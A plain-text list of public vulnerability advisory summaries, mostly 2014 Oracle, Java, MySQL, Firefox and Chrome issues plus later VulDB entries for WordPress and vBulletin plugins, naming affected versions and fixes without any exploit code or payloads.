Unspecified vulnerability in Spotfire Web Player Engine, Spotfire Desktop, and Spotfire Server Authentication Module in TIBCO Spotfire Server 3.3.x before 3.3.4, 4.5.x before 4.5.1, 5.0.x before 5.0.2, 5.5.x before 5.5.1, and 6.x before 6.0.2; Spotfire Professional 4.0.x before 4.0.4, 4.5.x before 4.5.2, 5.0.x before 5.0.2, 5.5.x before 5.5.1, and 6.x before 6.0.1; Spotfire Web Player 4.0.x before 4.0.4, 4.5.x before 4.5.2, 5.0.x before 5.0.2, 5.5.x before 5.5.1, and 6.x before 6.0.1; Spotfire Automation Services 4.0.x before 4.0.4, 4.5.x before 4.5.2, 5.0.x before 5.0.2, 5.5.x before 5.5.1, and 6.x before 6.0.1; Spotfire Deployment Kit 4.0.x before 4.0.4, 4.5.x before 4.5.2, 5.0.x before 5.0.2, 5.5.x before 5.5.1, and 6.x before 6.0.1; Spotfire Desktop 6.x before 6.0.1; and Spotfire Analyst 6.x before 6.0.1 allows remote attackers to execute arbitrary code via unknown vectors.
Directory traversal vulnerability in McAfee Cloud Identity Manager 3.0, 3.1, and 3.5.1, McAfee Cloud Single Sign On (MCSSO) before 4.0.1, and Intel Expressway Cloud Access 360-SSO 2.1 and 2.5 allows remote authenticated users to read an unspecified file containing a hash of the administrator password via unknown vectors.
Unspecified vulnerability in EMC RSA Archer GRC Platform 5.x before 5.5 SP1 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Test Framework.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Purchasing component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Purchasing.
Unspecified vulnerability in the Oracle Agile Product Collaboration component in Oracle Supply Chain Products Suite 9.3.3 allows remote attackers to affect integrity via unknown vectors related to Web client (PC).
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Portal Framework, a different vulnerability than CVE-2014-4205.
Unspecified vulnerability in the Java SE component in Oracle Java SE 7u60 and SE 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.12 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.12 allows local users to affect confidentiality via unknown vectors related to Core.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.14, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-4261.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.12 allows local users to affect integrity and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-2477.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows local users to affect confidentiality via unknown vectors related to Integration Business Services.
Unspecified vulnerability in the Java SE component in Oracle Java SE Java SE 7u60 and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2014-4223. NOTE: the previous information is from the July 2014 CPU. Oracle has not commented on another vendor's claim that the issue is related to improper restriction of the "use of privileged annotations."
Unspecified vulnerability in the Oracle Concurrent Processing component in Oracle E-Business Suite 12.1.3, 12.2.2, and 12.2.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0, 10.3.6.0, 12.1.1.0, and 12.1.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-2480.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0, 10.3.6.0, 12.1.1.0, and 12.1.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-2481.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.12 allows local users to affect integrity and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-2486.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 6.0 and 6.1 allows remote attackers to affect integrity via unknown vectors related to Learner Pages.
Unspecified vulnerability in lighttpd in Oracle Solaris 11.1 allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2014-2445.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Secure Global Desktop (SGD) component in Oracle Virtualization 4.63, 4.71, 5.0, and 5.1 allows remote attackers to affect integrity via unknown vectors related to Workspace Web Application, a different vulnerability than CVE-2014-4232.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 5.5.06, 6.0, 6.1, 6.2, 6.3, 6.3.1, 6.3.2, and 6.3.3 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.3.2 and 6.3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Agile Product Lifecycle component in Oracle Supply Chain Products Suite 6.1.0.3 and 6.1.1.3 allows remote attackers to affect integrity via unknown vectors related to Install.
Unspecified vulnerability in the Oracle Agile Product Lifecycle component in Oracle Supply Chain Products Suite 6.0 and 6.1.0 allows remote attackers to affect integrity via unknown vectors related to Install.
Unspecified vulnerability in the PeopleSoft Enterprise ELS Enterprise Learning Management component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Hyperion Common Admin component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to User Interface.
Unspecified vulnerability in the Hyperion Common Admin component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote attackers to affect confidentiality via unknown vectors related to User Interface.
Unspecified vulnerability in the Hyperion Common Admin component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote attackers to affect integrity via unknown vectors related to User Interface.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5 allows remote authenticated users to affect availability via unknown vectors related to Webserver Plugin.
Unspecified vulnerability in Oracle MySQL Server 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Privileges.
Unspecified vulnerability in Oracle MySQL Server 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS Talent Acquisition Manager component in Oracle PeopleSoft Products 9.0, 9.1, and 9.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Install and Packaging.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Integration Broker, a different vulnerability than CVE-2014-2437.
Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2014-2467.
Unspecified vulnerability in Oracle MySQL Server 5.6.15 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the MySQL Client component in Oracle MySQL 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Secure Global Desktop (SGD) component in Oracle Virtualization 5.0 and 5.1 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Workspace Web Application.
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Replication.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote attackers to affect confidentiality via unknown vectors related to Integration Broker, a different vulnerability than CVE-2014-2447.
Unspecified vulnerability in Oracle MySQL Server 5.6.16 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.53 allows remote attackers to affect availability via unknown vectors related to Integration Broker.
Unspecified vulnerability Oracle the MySQL Server component 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Federated.
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote attackers to affect availability via unknown vectors related to Options.
Unspecified vulnerability in Oracle MySQL Server 5.5.36 and earlier and 5.6.16 and earlier allows remote authenticated users to affect availability via unknown vectors related to Performance Schema.
Unspecified vulnerability in the PeopleSoft Enterprise CS Campus Self Service component in Oracle PeopleSoft Products 9.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Campus Mobile.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound.
Unspecified vulnerability in the Oracle OpenSSO component in Oracle Fusion Middleware 8.0 Update 2 Patch 5 allows remote authenticated users to affect integrity and availability via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle OpenSSO component in Oracle Fusion Middleware 8.0 Update 2 Patch 5 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and JavaFX 2.2.51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JavaFX 2.2.51; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2416, and CVE-2014-2417.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2416, and CVE-2014-2418.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2416, CVE-2014-2417, and CVE-2014-2418.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Identity Analytics component in Oracle Fusion Middleware Oracle Identity Analytics 11.1.1.5 and Sun Role Manager 5.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 8 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in Oracle Java SE 6u71, 7u51, and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to the "Grant Any Object Privilege."
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2415, CVE-2014-2416, CVE-2014-2417, and CVE-2014-2418.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to "Advisor" and "Select Any Dictionary" privileges.
Unspecified vulnerability in OpenJDK 6 before 6b31 on Debian GNU/Linux and Ubuntu 12.04 LTS and 10.04 LTS has unknown impact and attack vectors, a different vulnerability than CVE-2014-0462.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 10.1.4.3, 11.1.1.3.0, 11.1.1.5.0, 11.1.1.7.0, 11.1.2.0.0, 11.1.2.1.0, and 11.1.2.2.0 allows remote authenticated users to affect confidentiality via unknown vectors related to WebGate.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2014-0432 and CVE-2014-0455.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JavaFX 2.2.51; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 2.2.2 allows remote attackers to affect integrity via unknown vectors related to Oracle Endeca Information Discovery (Formerly Latitude), a different vulnerability than CVE-2014-2399.
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 2.2.2 allows remote attackers to affect integrity via unknown vectors related to Oracle Endeca Information Discovery (Formerly Latitude), a different vulnerability than CVE-2014-2400.
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JavaFX 2.2.51; and JRockit R27.8.1 and R28.3.1 allows remote authenticated users to affect integrity via unknown vectors related to Javadoc.
Unspecified vulnerability in Oracle Java SE 7u51 and 8, and Java SE Embedded 7u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Cross-site request forgery (CSRF) vulnerability in the web application on Omron NS5, NS8, NS10, NS12, and NS15 HMI terminals 8.1xx through 8.68x allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Advantech WebAccess before 7.2 allows remote authenticated users to create or delete arbitrary files via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Multisite GUI in Check_MK before 1.2.5i2 allow remote attackers to hijack the authentication of users for requests that (1) upload arbitrary snapshots, (2) delete arbitrary files, or possibly have other unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability on Siemens SIMATIC S7-1500 CPU PLC devices with firmware before 1.5.0 and SIMATIC S7-1200 CPU PLC devices with firmware before 4.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Sonatype Nexus OSS and Pro 2.4.0 through 2.7.1 allows attackers to create arbitrary user accounts via unknown vectors related to "an unauthenticated execution path."
Unrestricted file upload vulnerability in an unspecified third party tool in United Planet Intrexx Professional before 5.2 Online Update 0905 and 6.x before 6.0 Online Update 10 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via unknown vectors.
Unspecified vulnerability in Cybozu Remote Service Manager through 2.3.0 and 3.x before 3.1.1 allows remote attackers to cause a denial of service (CPU consumption) via unknown vectors.
Unspecified vulnerability in Message Server in SAP NetWeaver 7.20 allows remote attackers to cause a denial of service via unknown attack vectors.
Unspecified vulnerability in the Portal WebDynPro in SAP NetWeaver allows remote attackers to obtain sensitive path information via unknown attack vectors.
Unspecified vulnerability in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code with medium-integrity privileges and bypass a sandbox protection mechanism via unknown vectors, as demonstrated by ZDI during a Pwn4Fun competition at CanSecWest 2014.
Multiple unspecified vulnerabilities in Google Chrome before 35.0.1916.114 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 3.24.35.33, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 3.24.35.22, as used in Google Chrome before 34.0.1847.116, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 34.0.1847.116 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The GPU driver in the kernel in Google Chrome OS before 33.0.1750.152 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.
The AsyncPixelTransfersCompletedQuery::End function in gpu/command_buffer/service/query_manager.cc in Google Chrome, as used in Google Chrome OS before 33.0.1750.152, does not check whether a certain position is within the bounds of a shared-memory segment, which allows remote attackers to cause a denial of service (GPU command-buffer memory corruption) or possibly have unspecified other impact via unknown vectors.
Google V8, as used in Google Chrome before 33.0.1750.152 on OS X and Linux and before 33.0.1750.154 on Windows, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 3.23.17.18, as used in Google Chrome before 33.0.1750.149, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 32.0.1700.102 have unknown impact and attack vectors, related to 12 "security fixes [that were not] either contributed by external researchers or particularly interesting."
Unspecified vulnerability in Citrix XenMobile Device Manager server (formerly Zenprise Device Manager server) 8.5, 8.6, and MDM 8.0.1 allows remote attackers to obtain sensitive information via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 34.0 and SeaMonkey before 2.31 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 34.0, Firefox ESR 31.x before 31.3, Thunderbird before 31.3, and SeaMonkey before 2.31 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 33.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to improper interaction between threading and garbage collection in the GCRuntime::triggerGC function in js/src/jsgc.cpp, and unknown other vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox before 32.0, Firefox ESR 24.x before 24.8 and 31.x before 31.1, and Thunderbird 24.x before 24.8 and 31.x before 31.1 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 32.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 31.0 and Thunderbird before 31.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 30.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 30.0, Firefox ESR 24.x before 24.6, and Thunderbird before 24.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0 and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 28.0 and SeaMonkey before 2.25 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 28.0, Firefox ESR 24.x before 24.4, Thunderbird before 24.4, and SeaMonkey before 2.25 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0 and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to the MPostWriteBarrier class in js/src/jit/MIR.h and stack alignment in js/src/jit/AsmJS.cpp in OdinMonkey, and unknown other vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Apple Safari 7.0.2 on OS X allows remote attackers to execute arbitrary code with root privileges via unknown vectors, as demonstrated by Google during a Pwn4Fun competition at CanSecWest 2014.
A vulnerability was found in namithjawahar Wp-Insert up to 2.0.8 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.9 is able to address this issue. The name of the patch is a07b7b08084b9b85859f3968ce7fde0fd1fcbba3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-259628.
A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability.
A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Bestwebsoft Relevant Plugin up to 1.0.7 on WordPress. Affected by this vulnerability is an unknown functionality of the component Thumbnail Handler. The manipulation leads to information disclosure. The attack can be launched remotely. Upgrading to version 1.0.8 is able to address this issue. The identifier of the patch is 860d1891025548cf0f5f97364c1f51a888f523c3. It is recommended to upgrade the affected component. The identifier VDB-230113 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Portfolio Gallery Plugin up to 1.1.8 on WordPress. This affects an unknown part. The manipulation leads to sql injection. It is possible to initiate the attack remotely. Upgrading to version 1.1.9 is able to address this issue. The identifier of the patch is 58ed88243e17df766036f4857041edaf358076d3. It is recommended to upgrade the affected component. The identifier VDB-230085 was assigned to this vulnerability.
A vulnerability classified as problematic was found in BestWebSoft Job Board Plugin 1.0.0 on WordPress. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is dbb71deee071422ce3e663fbcdce3ad24886f940. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227764.
A vulnerability has been found in I Recommend This Plugin up to 3.7.2 on WordPress and classified as critical. Affected by this vulnerability is an unknown functionality of the file dot-irecommendthis.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 058b3ef5c7577bf557557904a53ecc8599b13649. It is recommended to upgrade the affected component. The identifier VDB-226309 was assigned to this vulnerability.
A vulnerability was found in Fancy Gallery Plugin 1.5.12 on WordPress. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file class.options.php of the component Options Page. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.13 is able to address this issue. The identifier of the patch is fdf1f9e5a1ec738900f962e69c6fa4ec6055ed8d. It is recommended to upgrade the affected component. The identifier VDB-225349 was assigned to this vulnerability.
A vulnerability classified as problematic was found in phpMiniAdmin up to 1.8.120510. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.9.140405 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-225001 was assigned to this vulnerability.
A vulnerability has been found in Ad Blocking Detector Plugin up to 1.2.1 on WordPress and classified as problematic. This vulnerability affects unknown code of the file ad-blocking-detector.php. The manipulation leads to information disclosure. The attack can be initiated remotely. Upgrading to version 1.2.2 is able to address this issue. The patch is identified as 3312b9cd79e5710d1e282fc9216a4e5ab31b3d94. It is recommended to upgrade the affected component. VDB-222610 is the identifier assigned to this vulnerability.
A vulnerability has been found in codepeople cp-polls Plugin 1.0.1 on WordPress and classified as critical. This vulnerability affects unknown code of the file cp-admin-int-message-list.inc.php. The manipulation of the argument lu leads to sql injection. The attack can be initiated remotely. Upgrading to version 1.0.2 is able to address this issue. The name of the patch is 6d7168cbf12d1c183bacc5cd5678f6f5b0d518d2. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222268.
A vulnerability was found in qt-users-jp silk 0.0.1. It has been declared as problematic. This vulnerability affects unknown code of the file contents/root/examples/header.qml. The manipulation of the argument model.key/model.value leads to cross site scripting. The attack can be initiated remotely. The name of the patch is bbc5d6eeea800025ef29edda3fd3c57836239eae. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221488.
A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480.
A vulnerability has been found in Gimmie Plugin 1.2.2 on vBulletin and classified as critical. Affected by this vulnerability is an unknown functionality of the file trigger_login.php. The manipulation of the argument userid leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The patch is named fe851002d20a8d6196a5abb68bafec4102964d5b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220207.
A vulnerability, which was classified as critical, was found in Gimmie Plugin 1.2.2 on vBulletin. Affected is an unknown function of the file trigger_ratethread.php. The manipulation of the argument t/postusername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The patch is identified as f11a136e9cbd24997354965178728dc22a2aa2ed. It is recommended to upgrade the affected component. VDB-220206 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Gimmie Plugin 1.2.2 on vBulletin. This issue affects some unknown processing of the file trigger_referral.php. The manipulation of the argument referrername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The identifier of the patch is 7194a09353dd24a274678383a4418f2fd3fce6f7. It is recommended to upgrade the affected component. The identifier VDB-220205 was assigned to this vulnerability.
A vulnerability has been found in Anant Labs google-enterprise-connector-dctm up to 3.2.3 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username/domain leads to sql injection. The patch is named 6fba04f18ab7764002a1da308e7cd9712b501cb7. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218911.
